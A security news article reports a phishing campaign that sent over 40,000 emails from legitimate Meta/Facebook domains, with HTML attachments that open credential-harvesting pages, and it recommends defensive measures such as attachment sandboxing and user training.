Facebook Domain Hijacking: How Legitimate Meta Infrastructure Fuels Global Phishing

A sophisticated global phishing campaign has been uncovered that weaponizes Facebook's legitimate infrastructure to target thousands of businesses worldwide, security researchers have revealed. The attack campaign has distributed over 40,000 malicious emails originating from official Meta domains, effectively bypassing traditional email security measures by leveraging the trusted reputation of Facebook's email infrastructure.

This campaign represents a significant evolution in phishing tactics, where threat actors have moved beyond simple domain spoofing to actual exploitation of legitimate corporate infrastructure. By sending emails from verified Facebook domains, attackers have managed to achieve exceptionally high delivery rates while maintaining low detection scores across conventional security platforms.

European businesses appear to be the primary focus of this campaign, with attackers using carefully crafted HTML attachments that deploy credential harvesting pages mimicking legitimate corporate login portals. The HTML files are designed to bypass attachment filtering while maintaining the appearance of legitimate business communications.

Technical analysis reveals that the attackers are exploiting Meta's email sending capabilities, though the exact method of compromise remains under investigation. Security experts suggest this could involve compromised business accounts with elevated sending privileges, API vulnerabilities, or other forms of infrastructure misuse.

The phishing emails typically arrive with convincing subject lines related to business operations, account verification, or security alerts. When recipients open the HTML attachments, they're presented with login pages that closely resemble legitimate corporate authentication systems, complete with proper branding and security indicators.

What makes this campaign particularly dangerous is the combination of legitimate sending infrastructure with sophisticated social engineering. Recipients see emails coming from verified Facebook domains, which naturally lowers their suspicion and increases the likelihood of engagement with malicious content.

Security teams are facing unprecedented challenges in detecting these attacks. Traditional email security solutions that rely on domain reputation scoring are effectively neutralized, as the emails originate from legitimate, high-reputation sources. Similarly, DMARC, DKIM, and SPF checks all pass successfully since the emails are genuinely sent from Facebook's infrastructure.

The campaign highlights a growing trend where threat actors are increasingly targeting the infrastructure of major technology providers rather than just their users. This approach provides attackers with multiple advantages: higher email delivery rates, improved credibility, and reduced detection likelihood.

Organizations are advised to implement multi-layered defense strategies including advanced attachment sandboxing, user behavior analytics, and comprehensive security awareness training. Employees should be educated about the possibility of legitimate domains being used for malicious purposes and trained to scrutinize all email attachments regardless of sender reputation.

Security researchers recommend implementing additional verification steps for emails containing HTML attachments, even when they originate from trusted domains. Organizations should also consider deploying solutions that can analyze the content and behavior of HTML attachments in isolated environments before they reach end users.

The discovery of this campaign serves as a stark reminder that in modern cybersecurity, trust cannot be automatically granted based on domain reputation alone. As threat actors continue to evolve their tactics, security professionals must adapt their defensive strategies to address the blurring lines between legitimate and malicious infrastructure usage.

Meta has been notified of the campaign and is reportedly investigating the abuse of their infrastructure. Meanwhile, businesses worldwide are urged to review their email security configurations and ensure they have adequate protection against this emerging threat vector that exploits the very trust relationships that underpin modern business communications.